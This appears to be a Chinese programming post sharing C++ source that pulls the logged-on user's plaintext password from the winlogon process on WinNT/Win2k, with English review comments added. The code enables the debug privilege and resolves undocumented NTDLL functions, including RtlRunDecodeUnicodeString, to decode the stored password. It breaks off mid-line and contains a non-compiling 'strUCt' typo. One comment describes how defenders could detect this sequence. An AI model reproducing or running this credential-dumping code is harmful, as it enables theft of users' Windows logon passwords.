本文所用的代码原创作者已不知.是ccrun的一个朋友磨刀老头提供给的,在此对作者表示感谢.经ccrun(老妖)在Win2k下试验成功.
// Retrieves the current user name and password on WinNT/Win2k; the entry point is:
//   bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
// (the original comment spelled it "GetPassWord"; the prototype and definition
// below use "GetPassword").
//---------------------------------------------------------------------------
// Hand-declared copies of NT-internal structures consumed by the routines that
// follow. None of these come from the public SDK headers: fields named UnkXX are
// offsets the original author left unidentified, and the layouts are tied to the
// specific OS builds the author tested against (WinNT / Win2k per the header note).
// NOTE(review): "strUCt" in the first typedef is not a C/C++ keyword and will not
// compile as written; presumably a transcription artefact for "struct" — confirm
// against the original source before building.
typedef strUCt _UNICODE_STRING {
    USHORT Length;          // NT convention: sizes in bytes, not characters — TODO confirm for this use
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// Presumably one entry of a system-wide handle enumeration; verify against the
// NtQuerySystemInformation call site, which is outside this excerpt.
typedef struct _QUERY_SYSTEM_INFORMATION {
    DWORD GrantedAccess;
    DWORD PID;
    WORD  HandleType;
    WORD  HandleId;
    DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;

// Header preceding an array of PROCESS_INFO records; presumably the buffer
// returned through RtlQueryProcessDebugInformation — confirm at the call site.
typedef struct _PROCESS_INFO_HEADER {
    DWORD Count;    // number of PROCESS_INFO records that follow
    DWORD Unk04;
    DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;

// One loaded-module record. LoadAddress/Size are 32-bit, so this layout only
// describes the 32-bit targets the author worked on.
typedef struct _PROCESS_INFO {
    DWORD LoadAddress;
    DWORD Size;
    DWORD Unk08;
    DWORD Enumerator;
    DWORD Unk10;
    char  Name [0x108];   // NUL-terminated module path, fixed-size — TODO confirm termination is guaranteed
} PROCESS_INFO, *PPROCESS_INFO;

// Record the code searches for in the target process. The globals below store a
// copy of HashByte (dwHashByte) and of the string's length (dwPwdLen); exactly how
// they are used is outside this excerpt.
typedef struct _ENCODED_PASSWORD_INFO {
    DWORD    HashByte;
    DWORD    Unk04;
    DWORD    Unk08;
    DWORD    Unk0C;
    FILETIME LoggedOn;
    DWORD    Unk18;
    DWORD    Unk1C;
    DWORD    Unk20;
    DWORD    Unk24;
    DWORD    Unk28;
    UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
// Calling-convention typedefs for the NTDLL entry points resolved in GetPassword.
// The original author declared every status, handle and information-class
// argument as DWORD and every buffer as PVOID. On the 32-bit __stdcall targets
// this code presumably assumes the sizes line up, but the prototypes carry no type
// information, so an argument-order mistake at a call site would not be caught by
// the compiler — treat them as raw ABI shims, not as documentation of the APIs.
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void  (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void  (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
// Private prototypes (the bodies are not part of this excerpt). Read in order they
// outline the routine: OS version check, privilege elevation, locating the winlogon
// process, locating the page that holds the credential record, then a per-OS
// extraction step. Parameter names are omitted here; keeping them in the
// prototypes would make the DWORD/PDWORD pairs self-describing.
// NOTE(review): GetPassword's own comment says "only for 2000 or XP" while the
// version gates below are IsWinNT/IsWin2K — one of the two is stale; confirm which.
// NOTE(review): from a defender's side this sequence is the signal to monitor for —
// a process enabling a debug privilege (presumably SeDebugPrivilege, given the
// name) and then reading another process's memory; an endpoint monitor can record
// both steps independently of how the caller is named.
BOOL  IsWinNT(void);
BOOL  IsWin2K(void);
BOOL  AddDebugPrivilege(void);
DWORD FindWinLogon(void);
BOOL  LocatePasswordPageWinNT(DWORD, PDWORD);
BOOL  LocatePasswordPageWin2K(DWORD, PDWORD);
void  ReturnWinNTPwd(String &, String &, String &);
void  ReturnWin2kPwd(String &, String &, String &);
bool  GetPassword(String &, String &, String &);
// Global function pointers, filled in by GetPassword via GetProcAddress on
// NTDLL.DLL. These exports are undocumented, so the program cannot bind to them at
// link time. They are file-scope and non-static; nothing visible resets them
// between calls. In the visible part of GetPassword the GetProcAddress results are
// stored without a NULL check, and the LoadLibrary handle is likewise unchecked, so
// a system that lacks any of these exports would fault on first use — confirm
// whether checks exist beyond this excerpt.
PFNNTQUERYSYSTEMINFORMATION        pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER       pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER      pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING      pfnRtlRunDecodeUnicodeString;
DWORD dwPwdLen = 0; PVOID pvRealPwd = NULL; PVOID pvPwd = NULL; DWORD dwHashByte = 0; wchar_t wszUserName[0x400]; wchar_t wszUserDomain[0x400]; //--------------------------------------------------------------------------- bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) { if(!IsWinNT() && !IsWin2K()) { // 只适合于2000或者XP return false; } // Add debug privilege to PasswordReminder - // this is needed for the search for Winlogon. if(!AddDebugPrivilege()) { // 不能够添加debug特权 return false; } // debug特权已经成功加入到本程序 HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL"); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress(hNtDll,"NtQuerySystemInformation"); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer"); pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation"); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer"); pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString